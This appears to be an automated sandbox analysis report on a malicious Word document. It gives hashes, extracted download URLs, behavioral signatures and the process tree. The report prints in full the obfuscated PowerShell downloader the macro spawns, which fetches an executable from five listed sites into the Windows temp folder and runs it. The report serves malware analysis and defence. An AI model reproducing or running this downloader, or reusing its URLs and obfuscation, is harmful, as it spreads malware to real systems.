Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 09:02
Behavioral task
behavioral1
Sample
5e40afb62420bbc6ad25da48721f29eb_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5e40afb62420bbc6ad25da48721f29eb_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5e40afb62420bbc6ad25da48721f29eb_JaffaCakes118.doc
-
Size
266KB
-
MD5
5e40afb62420bbc6ad25da48721f29eb
-
SHA1
c7e7893c679f57b297ccdf7b2da61488f7c9cf0b
-
SHA256
6038c03c5a2f937de49b0e78c86dd25cc0c2b9677c8b824fa0a71d66b700b881
-
SHA512
876a42006821d90ca7de7e34b6987ff115d7a9c9de3bfcaced498494285eba060558c8d744773d988c7d691a63a1a133f9c7240ff8b9711ef583aa8543301f6b
-
SSDEEP
3072:VkhgqkhgACSQKaSx+SbtYqS4fvS7GQRbSVuz1QzC9klhxztsZ5QPwYCUB5BEiudV:VCwQK3RpVS7G4SVuz1QzLhxztsZGPwa
Malware Config
Extracted
http://doostankhodro.com/fK6qaMppa
http://dev.worldsofttech.com/TGToBTgXMgJxTL
http://disticaretpro.tinmedya.com/acmethemes/ifWwmIYow9hVD
http://debestevakantiedeals.nl/smVjfzShY
http://tcaircargo.com/fb_personalize/S8cVB2O0FQJxa_IYFMQ5lE
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powerSHELL.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4524 264 powerSHELL.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powerSHELL.exeflow pid process 23 4524 powerSHELL.exe 30 4524 powerSHELL.exe 36 4524 powerSHELL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 264 WINWORD.EXE 264 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powerSHELL.exepid process 4524 powerSHELL.exe 4524 powerSHELL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powerSHELL.exedescription pid process Token: SeDebugPrivilege 4524 powerSHELL.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEpid process 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE 264 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 264 wrote to memory of 4524 264 WINWORD.EXE powerSHELL.exe PID 264 wrote to memory of 4524 264 WINWORD.EXE powerSHELL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40afb62420bbc6ad25da48721f29eb_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powerSHELL.exepowerSHELL $v3l7BE = '$doTS9twI = new-obj0-9902258800ect -com0-9902258800obj0-9902258800ect wsc0-9902258800ript.she0-9902258800ll;$gU2RjaYZe = new-object sys0-9902258800tem.net.web0-9902258800client;$pfpm2AO = new-object random;$FtP5y = \"0-9902258800h0-9902258800t0-9902258800t0-9902258800p0-9902258800://doostankhodro.com/fK6qaMppa,0-9902258800h0-9902258800t0-9902258800t0-9902258800p0-9902258800://dev.worldsofttech.com/TGToBTgXMgJxTL,0-9902258800h0-9902258800t0-9902258800t0-9902258800p0-9902258800://disticaretpro.tinmedya.com/acmethemes/ifWwmIYow9hVD,0-9902258800h0-9902258800t0-9902258800t0-9902258800p0-9902258800://debestevakantiedeals.nl/smVjfzShY,0-9902258800h0-9902258800t0-9902258800t0-9902258800p0-9902258800://tcaircargo.com/fb_personalize/S8cVB2O0FQJxa_IYFMQ5lE\".spl0-9902258800it(\",\");$c4PJiR = $pfpm2AO.nex0-9902258800t(1, 65536);$KLuSv = \"c:\win0-9902258800dows\tem0-9902258800p\152.ex0-9902258800e\";for0-9902258800each($sN1Gne6oK in $FtP5y){try{$gU2RjaYZe.dow0-9902258800nlo0-9902258800adf0-9902258800ile($sN1Gne6oK.ToS0-9902258800tring(), $KLuSv);sta0-9902258800rt-pro0-9902258800cess $KLuSv;break;}catch{}}'.replace('0-9902258800', $N8CMx);$HN5Ckrzw = '';iex($v3l7BE);2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82